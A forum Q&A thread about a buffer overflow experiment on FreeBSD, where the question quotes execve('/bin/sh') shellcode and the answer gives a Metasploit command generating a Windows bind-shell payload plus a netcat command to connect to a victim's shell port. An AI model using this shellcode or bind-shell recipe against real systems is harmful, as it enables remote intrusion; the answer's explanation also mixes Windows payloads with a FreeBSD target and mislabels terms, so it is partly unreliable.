Buffer Overflow - Program terminates after spawning a shell

Question

I have been experimenting with buffer overflows on a FreeBSD system. As the first experiment I have tried to get the exploited program to start another process (/bin/hostname in this case). That all worked fine, the program printed the hostname and then terminated. After that I tried to make the program spawn a shell (i.e. executing /bin/sh). I assumed that this could be done by simply exchanging the string representing the program to be called. When I try this the exploited program simply quits, according to gdb it does successfully spawn a new process (/bin/sh). However, no shell is spawned. I then tried my first exploit and moved the /bin/sh file to /bin/hostname, still doesn't change anything. My question is now, what seems to be different about executing /bin/sh from any other command?

For reference, for the shell spawning attempt I used the following shellcode:

char code[] = "\x31\xc0\x50\x68\x2f\x2f\x73\x68"
"\x68\x2f\x62\x69\x6e\x89\xe3\x50"
"\x54\x53\xb0\x3b\x50\xcd\x80";

Answer 1

Hah, I see what you mean, but I believe you're making one fundamental mistake. You're invoking an interactive shell without binding it.

It's like calling an "ifconfig" command. If you want a single command executed, then your shell code is perfect, however if you want an interactive shell, you can't just run sh.

Simply running sh will cause a shell to be executed, it won't give you interactive control over the shell.

---

Solution: Use a shell code generator to make a reverse tcp shell or a bind shell and use that as the payload for your exploit.

If you're attempting to do this in Metasploit then here's an example command you want.

msfpayload windows/shell_bind_tcp LPORT=4444 R | msfencode -e x86/alpha_mixed -b '\x00' -t c

• Msfpayload is the name of the function. windows/shell_bind_tcp is the exploit path
• LPORT is the port on which the remote victim machine will have the shell accessable
• R is for raw output
• Then we pipe that to msfencode since we need it to be C code to be executable and it has to be compiled for that architecture
• -e denotes the encoding type and architecture to support, the eg is for Win Sp2
• -b denotes the bytes you may not use in the shell code. Eg 00 is a end of string byte
• -t is the output type, as C code.

Research a bit more and play around and you'll get it. Essentially it's much harder to get an interactive shell as compared to executing a static command.

Once done, you can use a program like netcat to connect and use the shell.

netcat.exe -nv <victim ip> <port where shell was bound to>

Hope this was the right solution.